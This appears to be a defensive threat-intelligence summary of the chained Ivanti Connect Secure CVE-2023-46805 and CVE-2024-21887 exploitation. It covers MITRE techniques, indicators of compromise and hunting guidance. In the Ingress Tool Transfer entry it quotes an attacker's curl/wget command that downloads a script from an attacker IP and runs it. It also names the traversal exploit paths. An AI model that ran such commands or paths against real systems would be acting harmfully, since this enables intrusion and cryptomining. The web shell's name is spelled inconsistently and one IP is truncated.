Keypoints
- Two zero-days—CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection)—affect Ivanti Connect Secure 9.x and 22.x and can be combined for unauthenticated root RCE.
- Exploitation is performed via a crafted HTTP POST with traversal in the URL and JSON containing a “type” key that holds shell commands executed on the appliance.
- Common payloads observed include a Python reverse shell (default Python on appliance) and wget/curl-downloadable .sh scripts that install crypto-miners (xmrig) or other tooling.
- Post-exploitation behaviors include outgoing curl requests to C2, SSH connections to internal hosts, and established encrypted external connections; persistence via a modified visits.py web shell (GIFTEDVISITOR) was observed.
- Researchers observed widespread compromise and PoC/tooling in the wild (Metasploit module available); Ivanti released mitigations and began issuing patches starting January 22.
- Key forensic artifacts and modified files were identified (examples under /home and /tmp) and should be checked during incident response and hunting.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploit is delivered by a crafted HTTP request to the VPN appliance (‘The attack is carried out by sending a carefully crafted request to the ICS appliance.’)
- [T1059] Command and Scripting Interpreter – Shell commands are supplied inside JSON and executed on the target (‘Next, JSON data is sent which under the “type:” key contains a shell command which will be executed on the victim.’)
- [T1105] Ingress Tool Transfer – Payloads and scripts are fetched via curl or wget and executed (‘…type curl >&/dev/null; curl -o /tmp/script.sh http://192.252.183[.]116:8089/… || type wget >&/dev/null; wget -O /tmp/script.sh http://192.252.183[.]116:8089/…; chmod +x /tmp/script.sh; /tmp/script.sh’)
- [T1071] Application Layer Protocol – Compromise results in an outbound reverse shell to attacker IP/port (‘the Python code executes and sends a reverse shell back to the attacker’s IP address and port’)
- [T1505.003] Server Software Component: Web Shell – Persistence achieved by modifying visits.py to install and call a web shell called GRIFTEDVISITOR (‘modifying a legitimate Ivanti component “visits.py” and incorporating malicious code which functions as a web shell. This code dubbed GRIFTEDVISITOR is called and executed when the following URI is accessed: “/api/v1/cav/client/visits”’)
- [T1021] Remote Services – Lateral movement behavior observed via SSH to other internal systems (‘SSH connections to other internal systems’)
Indicators of Compromise
- [IP Address] exploit and C2 contexts – 192.252.183.116 (payload hosting/C2 for miner), 65.130.146 (listed network IoC)
- [Domain] C2/hostnames – psecure[.]pro (listed network IoC)
- [File name / script] payloads and miner installer – d9a10f4568b649acae7bc2fe51fb5a98.sh (mining script), /tmp/script.sh (downloaded installer)
- [File paths] modified system and webserver artifacts – /home/webserver/htdocs/dana-na/auth/compcheckresult.cgi, /home/perl/DSLogConfig.pm, /tmp/s.py (examples of modified/created files)
- [Web shell] persistence artifact – GIFTEDVISITOR web shell invoked at /api/v1/cav/client/visits
Exploitation procedure and technical summary:
Two linked vulnerabilities in Ivanti Connect Secure (CVE-2023-46805 authentication bypass and CVE-2024-21887 command injection) allow an unauthenticated attacker to send a specially crafted HTTP POST to a vulnerable appliance that includes a traversal in the request URL to reach restricted functions. The attacker supplies JSON where the “type” field contains a shell command; because Python is present by default on the appliance, many observed exploits execute a Python reverse shell to an attacker-controlled IP/port. PoC examples show simple curl one-liners or short Python scripts that POST the payload and trigger execution, returning privileged output such as uid=0(root).
Common post-exploitation steps seen in the wild include downloading and executing shell scripts via curl/wget (often to /tmp), which install crypto-miners (xmrig) or other tooling, and opening outbound connections (reverse shells) to command-and-control. Attackers establish persistence by modifying Ivanti components (notably visits.py) to embed a web shell (GRIFTEDVISITOR) accessible at the /api/v1/cav/client/visits endpoint. Observed lateral and noisy behaviors include outbound curl requests to C2, SSH connections to internal hosts, and encrypted connections to external servers—these are primary detection signals for hunting and response.
For response and hunting, search for the exploitation URL patterns (e.g., requests containing /api/v1/totp/user-backup-code/../../ and /license/keys-status), unexpected POSTs with JSON carrying “type” commands, outbound connections to suspicious IPs (example 192.252.183.116), new or modified files under /home/webserver/htdocs and /tmp (e.g., compcheckresult.cgi, visits.py, /tmp/s.py), and the presence of the GRIFTEDVISITOR web shell. Apply vendor mitigations and the official patches provided by Ivanti; review logs for the indicators above and inspect for lateral movement from any compromised appliance.